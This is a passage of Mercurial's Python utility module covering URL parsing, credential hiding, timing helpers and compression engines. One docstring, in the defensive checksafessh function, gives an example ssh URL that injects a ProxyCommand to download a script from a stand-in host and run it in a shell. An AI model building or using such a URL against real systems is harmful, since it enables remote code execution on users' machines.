2776 2786 not (self.host.startswith('[') and self.host.endswith(']'))):
2777 2787 self._hostport = self.host
2778 2788 self.host, self.port = self.host.rsplit(':', 1)
2779 2789 if not self.host:
2780 2790 self.host = None
2781 2791
2782 2792 if (self.host and self.scheme == 'file' and
2783 2793 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2784 2794 raise error.Abort(_('file:// URLs can only refer to localhost'))
2785 2795
2786 2796 self.path = path
2787 2797
2788 2798 # leave the query string escaped
2789 2799 for a in ('user', 'passwd', 'host', 'port',
2790 2800 'path', 'fragment'):
2791 2801 v = getattr(self, a)
2792 2802 if v is not None:
2793 2803 setattr(self, a, urlreq.unquote(v))
2794 2804
2795 2805 @encoding.strmethod
2796 2806 def __repr__(self):
2797 2807 attrs = []
2798 2808 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2799 2809 'query', 'fragment'):
2800 2810 v = getattr(self, a)
2801 2811 if v is not None:
2802 2812 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2803 2813 return '<url %s>' % ', '.join(attrs)
2804 2814
2805 2815 def __bytes__(self):
2806 2816 r"""Join the URL's components back into a URL string.
2807 2817
2808 2818 Examples:
2809 2819
2810 2820 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2811 2821 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2812 2822 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2813 2823 'http://user:pw@host:80/?foo=bar&baz=42'
2814 2824 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2815 2825 'http://user:pw@host:80/?foo=bar%3dbaz'
2816 2826 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2817 2827 'ssh://user:pw@[::1]:2200//home/joe#'
2818 2828 >>> bytes(url(b'http://localhost:80//'))
2819 2829 'http://localhost:80//'
2820 2830 >>> bytes(url(b'http://localhost:80/'))
2821 2831 'http://localhost:80/'
2822 2832 >>> bytes(url(b'http://localhost:80'))
2823 2833 'http://localhost:80/'
2824 2834 >>> bytes(url(b'bundle:foo'))
2825 2835 'bundle:foo'
2826 2836 >>> bytes(url(b'bundle://../foo'))
2827 2837 'bundle:../foo'
2828 2838 >>> bytes(url(b'path'))
2829 2839 'path'
2830 2840 >>> bytes(url(b'file:///tmp/foo/bar'))
2831 2841 'file:///tmp/foo/bar'
2832 2842 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2833 2843 'file:///c:/tmp/foo/bar'
2834 2844 >>> print(url(br'bundle:foo\bar'))
2835 2845 bundle:foo\bar
2836 2846 >>> print(url(br'file:///D:\data\hg'))
2837 2847 file:///D:\data\hg
2838 2848 """
2839 2849 if self._localpath:
2840 2850 s = self.path
2841 2851 if self.scheme == 'bundle':
2842 2852 s = 'bundle:' + s
2843 2853 if self.fragment:
2844 2854 s += '#' + self.fragment
2845 2855 return s
2846 2856
2847 2857 s = self.scheme + ':'
2848 2858 if self.user or self.passwd or self.host:
2849 2859 s += '//'
2850 2860 elif self.scheme and (not self.path or self.path.startswith('/')
2851 2861 or hasdriveletter(self.path)):
2852 2862 s += '//'
2853 2863 if hasdriveletter(self.path):
2854 2864 s += '/'
2855 2865 if self.user:
2856 2866 s += urlreq.quote(self.user, safe=self._safechars)
2857 2867 if self.passwd:
2858 2868 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2859 2869 if self.user or self.passwd:
2860 2870 s += '@'
2861 2871 if self.host:
2862 2872 if not (self.host.startswith('[') and self.host.endswith(']')):
2863 2873 s += urlreq.quote(self.host)
2864 2874 else:
2865 2875 s += self.host
2866 2876 if self.port:
2867 2877 s += ':' + urlreq.quote(self.port)
2868 2878 if self.host:
2869 2879 s += '/'
2870 2880 if self.path:
2871 2881 # TODO: similar to the query string, we should not unescape the
2872 2882 # path when we store it, the path might contain '%2f' = '/',
2873 2883 # which we should *not* escape.
2874 2884 s += urlreq.quote(self.path, safe=self._safepchars)
2875 2885 if self.query:
2876 2886 # we store the query in escaped form.
2877 2887 s += '?' + self.query
2878 2888 if self.fragment is not None:
2879 2889 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2880 2890 return s
2881 2891
2882 2892 __str__ = encoding.strmethod(__bytes__)
2883 2893
2884 2894 def authinfo(self):
2885 2895 user, passwd = self.user, self.passwd
2886 2896 try:
2887 2897 self.user, self.passwd = None, None
2888 2898 s = bytes(self)
2889 2899 finally:
2890 2900 self.user, self.passwd = user, passwd
2891 2901 if not self.user:
2892 2902 return (s, None)
2893 2903 # authinfo[1] is passed to urllib2 password manager, and its
2894 2904 # URIs must not contain credentials. The host is passed in the
2895 2905 # URIs list because Python < 2.4.3 uses only that to search for
2896 2906 # a password.
2897 2907 return (s, (None, (s, self.host),
2898 2908 self.user, self.passwd or ''))
2899 2909
2900 2910 def isabs(self):
2901 2911 if self.scheme and self.scheme != 'file':
2902 2912 return True # remote URL
2903 2913 if hasdriveletter(self.path):
2904 2914 return True # absolute for our purposes - can't be joined()
2905 2915 if self.path.startswith(br'\\'):
2906 2916 return True # Windows UNC path
2907 2917 if self.path.startswith('/'):
2908 2918 return True # POSIX-style
2909 2919 return False
2910 2920
2911 2921 def localpath(self):
2912 2922 if self.scheme == 'file' or self.scheme == 'bundle':
2913 2923 path = self.path or '/'
2914 2924 # For Windows, we need to promote hosts containing drive
2915 2925 # letters to paths with drive letters.
2916 2926 if hasdriveletter(self._hostport):
2917 2927 path = self._hostport + '/' + self.path
2918 2928 elif (self.host is not None and self.path
2919 2929 and not hasdriveletter(path)):
2920 2930 path = '/' + path
2921 2931 return path
2922 2932 return self._origpath
2923 2933
2924 2934 def islocal(self):
2925 2935 '''whether localpath will return something that posixfile can open'''
2926 2936 return (not self.scheme or self.scheme == 'file'
2927 2937 or self.scheme == 'bundle')
2928 2938
2929 2939 def hasscheme(path):
2930 2940 return bool(url(path).scheme)
2931 2941
2932 2942 def hasdriveletter(path):
2933 2943 return path and path[1:2] == ':' and path[0:1].isalpha()
2934 2944
2935 2945 def urllocalpath(path):
2936 2946 return url(path, parsequery=False, parsefragment=False).localpath()
2937 2947
2938 2948 def checksafessh(path):
2939 2949 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2940 2950
2941 2951 This is a sanity check for ssh urls. ssh will parse the first item as
2942 2952 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2943 2953 Let's prevent these potentially exploited urls entirely and warn the
2944 2954 user.
2945 2955
2946 2956 Raises an error.Abort when the url is unsafe.
2947 2957 """
2948 2958 path = urlreq.unquote(path)
2949 2959 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2950 2960 raise error.Abort(_('potentially unsafe url: %r') %
2951 2961 (pycompat.bytestr(path),))
2952 2962
2953 2963 def hidepassword(u):
2954 2964 '''hide user credential in a url string'''
2955 2965 u = url(u)
2956 2966 if u.passwd:
2957 2967 u.passwd = '***'
2958 2968 return bytes(u)
2959 2969
2960 2970 def removeauth(u):
2961 2971 '''remove all authentication information from a url string'''
2962 2972 u = url(u)
2963 2973 u.user = u.passwd = None
2964 2974 return bytes(u)
2965 2975
2966 2976 timecount = unitcountfn(
2967 2977 (1, 1e3, _('%.0f s')),
2968 2978 (100, 1, _('%.1f s')),
2969 2979 (10, 1, _('%.2f s')),
2970 2980 (1, 1, _('%.3f s')),
2971 2981 (100, 0.001, _('%.1f ms')),
2972 2982 (10, 0.001, _('%.2f ms')),
2973 2983 (1, 0.001, _('%.3f ms')),
2974 2984 (100, 0.000001, _('%.1f us')),
2975 2985 (10, 0.000001, _('%.2f us')),
2976 2986 (1, 0.000001, _('%.3f us')),
2977 2987 (100, 0.000000001, _('%.1f ns')),
2978 2988 (10, 0.000000001, _('%.2f ns')),
2979 2989 (1, 0.000000001, _('%.3f ns')),
2980 2990 )
2981 2991
2982 2992 @attr.s
2983 2993 class timedcmstats(object):
2984 2994 """Stats information produced by the timedcm context manager on entering."""
2985 2995
2986 2996 # the starting value of the timer as a float (meaning and resulution is
2987 2997 # platform dependent, see util.timer)
2988 2998 start = attr.ib(default=attr.Factory(lambda: timer()))
2989 2999 # the number of seconds as a floating point value; starts at 0, updated when
2990 3000 # the context is exited.
2991 3001 elapsed = attr.ib(default=0)
2992 3002 # the number of nested timedcm context managers.
2993 3003 level = attr.ib(default=1)
2994 3004
2995 3005 def __bytes__(self):
2996 3006 return timecount(self.elapsed) if self.elapsed else '<unknown>'
2997 3007
2998 3008 __str__ = encoding.strmethod(__bytes__)
2999 3009
3000 3010 @contextlib.contextmanager
3001 3011 def timedcm(whencefmt, *whenceargs):
3002 3012 """A context manager that produces timing information for a given context.
3003 3013
3004 3014 On entering a timedcmstats instance is produced.
3005 3015
3006 3016 This context manager is reentrant.
3007 3017
3008 3018 """
3009 3019 # track nested context managers
3010 3020 timedcm._nested += 1
3011 3021 timing_stats = timedcmstats(level=timedcm._nested)
3012 3022 try:
3013 3023 with tracing.log(whencefmt, *whenceargs):
3014 3024 yield timing_stats
3015 3025 finally:
3016 3026 timing_stats.elapsed = timer() - timing_stats.start
3017 3027 timedcm._nested -= 1
3018 3028
3019 3029 timedcm._nested = 0
3020 3030
3021 3031 def timed(func):
3022 3032 '''Report the execution time of a function call to stderr.
3023 3033
3024 3034 During development, use as a decorator when you need to measure
3025 3035 the cost of a function, e.g. as follows:
3026 3036
3027 3037 @util.timed
3028 3038 def foo(a, b, c):
3029 3039 pass
3030 3040 '''
3031 3041
3032 3042 def wrapper(*args, **kwargs):
3033 3043 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3034 3044 result = func(*args, **kwargs)
3035 3045 stderr = procutil.stderr
3036 3046 stderr.write('%s%s: %s\n' % (
3037 3047 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3038 3048 time_stats))
3039 3049 return result
3040 3050 return wrapper
3041 3051
3042 3052 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3043 3053 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3044 3054
3045 3055 def sizetoint(s):
3046 3056 '''Convert a space specifier to a byte count.
3047 3057
3048 3058 >>> sizetoint(b'30')
3049 3059 30
3050 3060 >>> sizetoint(b'2.2kb')
3051 3061 2252
3052 3062 >>> sizetoint(b'6M')
3053 3063 6291456
3054 3064 '''
3055 3065 t = s.strip().lower()
3056 3066 try:
3057 3067 for k, u in _sizeunits:
3058 3068 if t.endswith(k):
3059 3069 return int(float(t[:-len(k)]) * u)
3060 3070 return int(t)
3061 3071 except ValueError:
3062 3072 raise error.ParseError(_("couldn't parse size: %s") % s)
3063 3073
3064 3074 class hooks(object):
3065 3075 '''A collection of hook functions that can be used to extend a
3066 3076 function's behavior. Hooks are called in lexicographic order,
3067 3077 based on the names of their sources.'''
3068 3078
3069 3079 def __init__(self):
3070 3080 self._hooks = []
3071 3081
3072 3082 def add(self, source, hook):
3073 3083 self._hooks.append((source, hook))
3074 3084
3075 3085 def __call__(self, *args):
3076 3086 self._hooks.sort(key=lambda x: x[0])
3077 3087 results = []
3078 3088 for source, hook in self._hooks:
3079 3089 results.append(hook(*args))
3080 3090 return results
3081 3091
3082 3092 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3083 3093 '''Yields lines for a nicely formatted stacktrace.
3084 3094 Skips the 'skip' last entries, then return the last 'depth' entries.
3085 3095 Each file+linenumber is formatted according to fileline.
3086 3096 Each line is formatted according to line.
3087 3097 If line is None, it yields:
3088 3098 length of longest filepath+line number,
3089 3099 filepath+linenumber,
3090 3100 function
3091 3101
3092 3102 Not be used in production code but very convenient while developing.
3093 3103 '''
3094 3104 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3095 3105 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3096 3106 ][-depth:]
3097 3107 if entries:
3098 3108 fnmax = max(len(entry[0]) for entry in entries)
3099 3109 for fnln, func in entries:
3100 3110 if line is None:
3101 3111 yield (fnmax, fnln, func)
3102 3112 else:
3103 3113 yield line % (fnmax, fnln, func)
3104 3114
3105 3115 def debugstacktrace(msg='stacktrace', skip=0,
3106 3116 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3107 3117 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3108 3118 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3109 3119 By default it will flush stdout first.
3110 3120 It can be used everywhere and intentionally does not require an ui object.
3111 3121 Not be used in production code but very convenient while developing.
3112 3122 '''
3113 3123 if otherf:
3114 3124 otherf.flush()
3115 3125 f.write('%s at:\n' % msg.rstrip())
3116 3126 for line in getstackframes(skip + 1, depth=depth):
3117 3127 f.write(line)
3118 3128 f.flush()
3119 3129
3120 3130 class dirs(object):
3121 3131 '''a multiset of directory names from a dirstate or manifest'''
3122 3132
3123 3133 def __init__(self, map, skip=None):
3124 3134 self._dirs = {}
3125 3135 addpath = self.addpath
3126 3136 if safehasattr(map, 'iteritems') and skip is not None:
3127 3137 for f, s in map.iteritems():
3128 3138 if s[0] != skip:
3129 3139 addpath(f)
3130 3140 else:
3131 3141 for f in map:
3132 3142 addpath(f)
3133 3143
3134 3144 def addpath(self, path):
3135 3145 dirs = self._dirs
3136 3146 for base in finddirs(path):
3137 3147 if base in dirs:
3138 3148 dirs[base] += 1
3139 3149 return
3140 3150 dirs[base] = 1
3141 3151
3142 3152 def delpath(self, path):
3143 3153 dirs = self._dirs
3144 3154 for base in finddirs(path):
3145 3155 if dirs[base] > 1:
3146 3156 dirs[base] -= 1
3147 3157 return
3148 3158 del dirs[base]
3149 3159
3150 3160 def __iter__(self):
3151 3161 return iter(self._dirs)
3152 3162
3153 3163 def __contains__(self, d):
3154 3164 return d in self._dirs
3155 3165
3156 3166 if safehasattr(parsers, 'dirs'):
3157 3167 dirs = parsers.dirs
3158 3168
3159 3169 def finddirs(path):
3160 3170 pos = path.rfind('/')
3161 3171 while pos != -1:
3162 3172 yield path[:pos]
3163 3173 pos = path.rfind('/', 0, pos)
3164 3174
3165 3175 # compression code
3166 3176
3167 3177 SERVERROLE = 'server'
3168 3178 CLIENTROLE = 'client'
3169 3179
3170 3180 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3171 3181 (u'name', u'serverpriority',
3172 3182 u'clientpriority'))
3173 3183
3174 3184 class compressormanager(object):
3175 3185 """Holds registrations of various compression engines.
3176 3186
3177 3187 This class essentially abstracts the differences between compression
3178 3188 engines to allow new compression formats to be added easily, possibly from
3179 3189 extensions.
3180 3190
3181 3191 Compressors are registered against the global instance by calling its
3182 3192 ``register()`` method.
3183 3193 """
3184 3194 def __init__(self):
3185 3195 self._engines = {}
3186 3196 # Bundle spec human name to engine name.
3187 3197 self._bundlenames = {}
3188 3198 # Internal bundle identifier to engine name.
3189 3199 self._bundletypes = {}
3190 3200 # Revlog header to engine name.
3191 3201 self._revlogheaders = {}
3192 3202 # Wire proto identifier to engine name.
3193 3203 self._wiretypes = {}
3194 3204
3195 3205 def __getitem__(self, key):
3196 3206 return self._engines[key]
3197 3207
3198 3208 def __contains__(self, key):
3199 3209 return key in self._engines
3200 3210
3201 3211 def __iter__(self):
3202 3212 return iter(self._engines.keys())
3203 3213
3204 3214 def register(self, engine):
3205 3215 """Register a compression engine with the manager.
3206 3216
3207 3217 The argument must be a ``compressionengine`` instance.
3208 3218 """
3209 3219 if not isinstance(engine, compressionengine):
3210 3220 raise ValueError(_('argument must be a compressionengine'))
3211 3221
3212 3222 name = engine.name()
3213 3223
3214 3224 if name in self._engines:
3215 3225 raise error.Abort(_('compression engine %s already registered') %
3216 3226 name)
3217 3227
3218 3228 bundleinfo = engine.bundletype()
3219 3229 if bundleinfo:
3220 3230 bundlename, bundletype = bundleinfo
3221 3231
3222 3232 if bundlename in self._bundlenames:
3223 3233 raise error.Abort(_('bundle name %s already registered') %
3224 3234 bundlename)
3225 3235 if bundletype in self._bundletypes:
3226 3236 raise error.Abort(_('bundle type %s already registered by %s') %
3227 3237 (bundletype, self._bundletypes[bundletype]))
3228 3238
3229 3239 # No external facing name declared.
3230 3240 if bundlename:
3231 3241 self._bundlenames[bundlename] = name
3232 3242
3233 3243 self._bundletypes[bundletype] = name
3234 3244
3235 3245 wiresupport = engine.wireprotosupport()
3236 3246 if wiresupport:
3237 3247 wiretype = wiresupport.name
3238 3248 if wiretype in self._wiretypes:
3239 3249 raise error.Abort(_('wire protocol compression %s already '
3240 3250 'registered by %s') %
3241 3251 (wiretype, self._wiretypes[wiretype]))
3242 3252
3243 3253 self._wiretypes[wiretype] = name
3244 3254
3245 3255 revlogheader = engine.revlogheader()
3246 3256 if revlogheader and revlogheader in self._revlogheaders:
3247 3257 raise error.Abort(_('revlog header %s already registered by %s') %
3248 3258 (revlogheader, self._revlogheaders[revlogheader]))
3249 3259
3250 3260 if revlogheader:
3251 3261 self._revlogheaders[revlogheader] = name
3252 3262
3253 3263 self._engines[name] = engine
3254 3264
3255 3265 @property
3256 3266 def supportedbundlenames(self):
3257 3267 return set(self._bundlenames.keys())
3258 3268
3259 3269 @property
3260 3270 def supportedbundletypes(self):
3261 3271 return set(self._bundletypes.keys())
3262 3272
3263 3273 def forbundlename(self, bundlename):
3264 3274 """Obtain a compression engine registered to a bundle name.
3265 3275
3266 3276 Will raise KeyError if the bundle type isn't registered.
3267 3277
3268 3278 Will abort if the engine is known but not available.
3269 3279 """
3270 3280 engine = self._engines[self._bundlenames[bundlename]]
3271 3281 if not engine.available():
3272 3282 raise error.Abort(_('compression engine %s could not be loaded') %
3273 3283 engine.name())
3274 3284 return engine
3275 3285
3276 3286 def forbundletype(self, bundletype):
3277 3287 """Obtain a compression engine registered to a bundle type.
3278 3288
3279 3289 Will raise KeyError if the bundle type isn't registered.
3280 3290
3281 3291 Will abort if the engine is known but not available.
3282 3292 """
3283 3293 engine = self._engines[self._bundletypes[bundletype]]
3284 3294 if not engine.available():
3285 3295 raise error.Abort(_('compression engine %s could not be loaded') %
3286 3296 engine.name())
3287 3297 return engine
3288 3298
3289 3299 def supportedwireengines(self, role, onlyavailable=True):
3290 3300 """Obtain compression engines that support the wire protocol.
3291 3301
3292 3302 Returns a list of engines in prioritized order, most desired first.
3293 3303
3294 3304 If ``onlyavailable`` is set, filter out engines that can't be
3295 3305 loaded.
3296 3306 """
3297 3307 assert role in (SERVERROLE, CLIENTROLE)
3298 3308
3299 3309 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3300 3310
3301 3311 engines = [self._engines[e] for e in self._wiretypes.values()]
3302 3312 if onlyavailable:
3303 3313 engines = [e for e in engines if e.available()]
3304 3314
3305 3315 def getkey(e):
3306 3316 # Sort first by priority, highest first. In case of tie, sort
3307 3317 # alphabetically. This is arbitrary, but ensures output is
3308 3318 # stable.
3309 3319 w = e.wireprotosupport()
3310 3320 return -1 * getattr(w, attr), w.name
3311 3321
3312 3322 return list(sorted(engines, key=getkey))
3313 3323
3314 3324 def forwiretype(self, wiretype):
3315 3325 engine = self._engines[self._wiretypes[wiretype]]
3316 3326 if not engine.available():
3317 3327 raise error.Abort(_('compression engine %s could not be loaded') %
3318 3328 engine.name())
3319 3329 return engine
3320 3330
3321 3331 def forrevlogheader(self, header):
3322 3332 """Obtain a compression engine registered to a revlog header.
3323 3333
3324 3334 Will raise KeyError if the revlog header value isn't registered.
3325 3335 """
3326 3336 return self._engines[self._revlogheaders[header]]
3327 3337
3328 3338 compengines = compressormanager()
3329 3339
3330 3340 class compressionengine(object):
3331 3341 """Base class for compression engines.
3332 3342
3333 3343 Compression engines must implement the interface defined by this class.
3334 3344 """
3335 3345 def name(self):
3336 3346 """Returns the name of the compression engine.
3337 3347
3338 3348 This is the key the engine is registered under.
3339 3349
3340 3350 This method must be implemented.
3341 3351 """
3342 3352 raise NotImplementedError()
3343 3353
3344 3354 def available(self):
3345 3355 """Whether the compression engine is available.
3346 3356
3347 3357 The intent of this method is to allow optional compression engines
3348 3358 that may not be available in all installations (such as engines relying
3349 3359 on C extensions that may not be present).
3350 3360 """
3351 3361 return True
3352 3362
3353 3363 def bundletype(self):
3354 3364 """Describes bundle identifiers for this engine.
3355 3365
3356 3366 If this compression engine isn't supported for bundles, returns None.
3357 3367
3358 3368 If this engine can be used for bundles, returns a 2-tuple of strings of
3359 3369 the user-facing "bundle spec" compression name and an internal
3360 3370 identifier used to denote the compression format within bundles. To
3361 3371 exclude the name from external usage, set the first element to ``None``.
3362 3372
3363 3373 If bundle compression is supported, the class must also implement
3364 3374 ``compressstream`` and `decompressorreader``.
3365 3375
3366 3376 The docstring of this method is used in the help system to tell users
3367 3377 about this engine.
3368 3378 """
3369 3379 return None
3370 3380
3371 3381 def wireprotosupport(self):
3372 3382 """Declare support for this compression format on the wire protocol.
3373 3383
3374 3384 If this compression engine isn't supported for compressing wire
3375 3385 protocol payloads, returns None.
3376 3386
3377 3387 Otherwise, returns ``compenginewireprotosupport`` with the following
3378 3388 fields:
3379 3389
3380 3390 * String format identifier
3381 3391 * Integer priority for the server
3382 3392 * Integer priority for the client
3383 3393
3384 3394 The integer priorities are used to order the advertisement of format
3385 3395 support by server and client. The highest integer is advertised
3386 3396 first. Integers with non-positive values aren't advertised.
3387 3397
3388 3398 The priority values are somewhat arbitrary and only used for default
3389 3399 ordering. The relative order can be changed via config options.
3390 3400
3391 3401 If wire protocol compression is supported, the class must also implement
3392 3402 ``compressstream`` and ``decompressorreader``.
3393 3403 """
3394 3404 return None
3395 3405
3396 3406 def revlogheader(self):
3397 3407 """Header added to revlog chunks that identifies this engine.
3398 3408
3399 3409 If this engine can be used to compress revlogs, this method should
3400 3410 return the bytes used to identify chunks compressed with this engine.
3401 3411 Else, the method should return ``None`` to indicate it does not
3402 3412 participate in revlog compression.
3403 3413 """
3404 3414 return None
3405 3415
3406 3416 def compressstream(self, it, opts=None):
3407 3417 """Compress an iterator of chunks.
3408 3418
3409 3419 The method receives an iterator (ideally a generator) of chunks of
3410 3420 bytes to be compressed. It returns an iterator (ideally a generator)
3411 3421 of bytes of chunks representing the compressed output.
3412 3422
3413 3423 Optionally accepts an argument defining how to perform compression.
3414 3424 Each engine treats this argument differently.
3415 3425 """
3416 3426 raise NotImplementedError()
3417 3427
3418 3428 def decompressorreader(self, fh):
3419 3429 """Perform decompression on a file object.
3420 3430
3421 3431 Argument is an object with a ``read(size)`` method that returns
3422 3432 compressed data. Return value is an object with a ``read(size)`` that
3423 3433 returns uncompressed data.
3424 3434 """
3425 3435 raise NotImplementedError()
3426 3436
3427 3437 def revlogcompressor(self, opts=None):
3428 3438 """Obtain an object that can be used to compress revlog entries.
3429 3439
3430 3440 The object has a ``compress(data)`` method that compresses binary
3431 3441 data. This method returns compressed binary data or ``None`` if
3432 3442 the data could not be compressed (too small, not compressible, etc).
3433 3443 The returned data should have a header uniquely identifying this
3434 3444 compression format so decompression can be routed to this engine.
3435 3445 This header should be identified by the ``revlogheader()`` return
3436 3446 value.
3437 3447
3438 3448 The object has a ``decompress(data)`` method that decompresses
3439 3449 data. The method will only be called if ``data`` begins with
3440 3450 ``revlogheader()``. The method should return the raw, uncompressed
3441 3451 data or raise a ``RevlogError``.
3442 3452
3443 3453 The object is reusable but is not thread safe.
3444 3454 """
3445 3455 raise NotImplementedError()
3446 3456
3447 3457 class _CompressedStreamReader(object):
3448 3458 def __init__(self, fh):
3449 3459 if safehasattr(fh, 'unbufferedread'):
3450 3460 self._reader = fh.unbufferedread
3451 3461 else:
3452 3462 self._reader = fh.read
3453 3463 self._pending = []
3454 3464 self._pos = 0
3455 3465 self._eof = False
3456 3466
3457 3467 def _decompress(self, chunk):
3458 3468 raise NotImplementedError()
3459 3469
3460 3470 def read(self, l):
3461 3471 buf = []
3462 3472 while True:
3463 3473 while self._pending:
3464 3474 if len(self._pending[0]) > l + self._pos:
3465 3475 newbuf = self._pending[0]
3466 3476 buf.append(newbuf[self._pos:self._pos + l])
3467 3477 self._pos += l
3468 3478 return ''.join(buf)
3469 3479
3470 3480 newbuf = self._pending.pop(0)
3471 3481 if self._pos:
3472 3482 buf.append(newbuf[self._pos:])
3473 3483 l -= len(newbuf) - self._pos
3474 3484 else:
3475 3485 buf.append(newbuf)
3476 3486 l -= len(newbuf)
3477 3487 self._pos = 0
3478 3488
3479 3489 if self._eof:
3480 3490 return ''.join(buf)
3481 3491 chunk = self._reader(65536)
3482 3492 self._decompress(chunk)
3483 3493 if not chunk and not self._pending and not self._eof:
3484 3494 # No progress and no new data, bail out
3485 3495 return ''.join(buf)
3486 3496
3487 3497 class _GzipCompressedStreamReader(_CompressedStreamReader):
3488 3498 def __init__(self, fh):
3489 3499 super(_GzipCompressedStreamReader, self).__init__(fh)
3490 3500 self._decompobj = zlib.decompressobj()
3491 3501 def _decompress(self, chunk):
3492 3502 newbuf = self._decompobj.decompress(chunk)
3493 3503 if newbuf:
3494 3504 self._pending.append(newbuf)
3495 3505 d = self._decompobj.copy()
3496 3506 try:
3497 3507 d.decompress('x')
3498 3508 d.flush()
3499 3509 if d.unused_data == 'x':
3500 3510 self._eof = True
3501 3511 except zlib.error:
3502 3512 pass
3503 3513
3504 3514 class _BZ2CompressedStreamReader(_CompressedStreamReader):
3505 3515 def __init__(self, fh):
3506 3516 super(_BZ2CompressedStreamReader, self).__init__(fh)
3507 3517 self._decompobj = bz2.BZ2Decompressor()
3508 3518 def _decompress(self, chunk):
3509 3519 newbuf = self._decompobj.decompress(chunk)
3510 3520 if newbuf:
3511 3521 self._pending.append(newbuf)
3512 3522 try:
3513 3523 while True:
3514 3524 newbuf = self._decompobj.decompress('')
3515 3525 if newbuf:
3516 3526 self._pending.append(newbuf)
3517 3527 else:
3518 3528 break
3519 3529 except EOFError:
3520 3530 self._eof = True
3521 3531
3522 3532 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3523 3533 def __init__(self, fh):
3524 3534 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3525 3535 newbuf = self._decompobj.decompress('BZ')
3526 3536 if newbuf:
3527 3537 self._pending.append(newbuf)
3528 3538
3529 3539 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3530 3540 def __init__(self, fh, zstd):
3531 3541 super(_ZstdCompressedStreamReader, self).__init__(fh)
3532 3542 self._zstd = zstd
3533 3543 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3534 3544 def _decompress(self, chunk):
3535 3545 newbuf = self._decompobj.decompress(chunk)
3536 3546 if newbuf:
3537 3547 self._pending.append(newbuf)
3538 3548 try:
3539 3549 while True:
3540 3550 newbuf = self._decompobj.decompress('')
3541 3551 if newbuf:
3542 3552 self._pending.append(newbuf)
3543 3553 else:
3544 3554 break
3545 3555 except self._zstd.ZstdError:
3546 3556 self._eof = True
3547 3557
3548 3558 class _zlibengine(compressionengine):
3549 3559 def name(self):
3550 3560 return 'zlib'
3551 3561
3552 3562 def bundletype(self):
3553 3563 """zlib compression using the DEFLATE algorithm.
3554 3564
3555 3565 All Mercurial clients should support this format. The compression
3556 3566 algorithm strikes a reasonable balance between compression ratio
3557 3567 and size.
3558 3568 """
3559 3569 return 'gzip', 'GZ'
3560 3570
3561 3571 def wireprotosupport(self):
3562 3572 return compewireprotosupport('zlib', 20, 20)
3563 3573
3564 3574 def revlogheader(self):
3565 3575 return 'x'
3566 3576
3567 3577 def compressstream(self, it, opts=None):
3568 3578 opts = opts or {}
3569 3579
3570 3580 z = zlib.compressobj(opts.get('level', -1))
3571 3581 for chunk in it:
3572 3582 data = z.compress(chunk)
3573 3583 # Not all calls to compress emit data. It is cheaper to inspect
3574 3584 # here than to feed empty chunks through generator.
3575 3585 if data:
3576 3586 yield data
3577 3587
3578 3588 yield z.flush()
3579 3589
3580 3590 def decompressorreader(self, fh):
3581 3591 return _GzipCompressedStreamReader(fh)
3582 3592
3583 3593 class zlibrevlogcompressor(object):
3584 3594 def compress(self, data):
3585 3595 insize = len(data)
3586 3596 # Caller handles empty input case.
3587 3597 assert insize > 0
3588 3598
3589 3599 if insize < 44:
3590 3600 return None
3591 3601
3592 3602 elif insize <= 1000000:
3593 3603 compressed = zlib.compress(data)
3594 3604 if len(compressed) < insize:
3595 3605 return compressed
3596 3606 return None
3597 3607
3598 3608 # zlib makes an internal copy of the input buffer, doubling
3599 3609 # memory usage for large inputs. So do streaming compression
3600 3610 # on large inputs.
3601 3611 else:
3602 3612 z = zlib.compressobj()
3603 3613 parts = []
3604 3614 pos = 0
3605 3615 while pos < insize:
3606 3616 pos2 = pos + 2**20
3607 3617 parts.append(z.compress(data[pos:pos2]))
3608 3618 pos = pos2
3609 3619 parts.append(z.flush())
3610 3620
3611 3621 if sum(map(len, parts)) < insize:
3612 3622 return ''.join(parts)
3613 3623 return None
3614 3624
3615 3625 def decompress(self, data):
3616 3626 try:
3617 3627 return zlib.decompress(data)
3618 3628 except zlib.error as e:
3619 3629 raise error.RevlogError(_('revlog decompress error: %s') %
3620 3630 stringutil.forcebytestr(e))
3621 3631
3622 3632 def revlogcompressor(self, opts=None):
3623 3633 return self.zlibrevlogcompressor()
3624 3634
3625 3635 compengines.register(_zlibengine())
3626 3636
3627 3637 class _bz2engine(compressionengine):
3628 3638 def name(self):
3629 3639 return 'bz2'
3630 3640
3631 3641 def bundletype(self):
3632 3642 """An algorithm that produces smaller bundles than ``gzip``.
3633 3643
3634 3644 All Mercurial clients should support this format.
3635 3645
3636 3646 This engine will likely produce smaller bundles than ``gzip`` but
3637 3647 will be significantly slower, both during compression and
3638 3648 decompression.
3639 3649
3640 3650 If available, the ``zstd`` engine can yield similar or better
3641 3651 compression at much higher speeds.
3642 3652 """
3643 3653 return 'bzip2', 'BZ'
3644 3654
3645 3655 # We declare a protocol name but don't advertise by default because
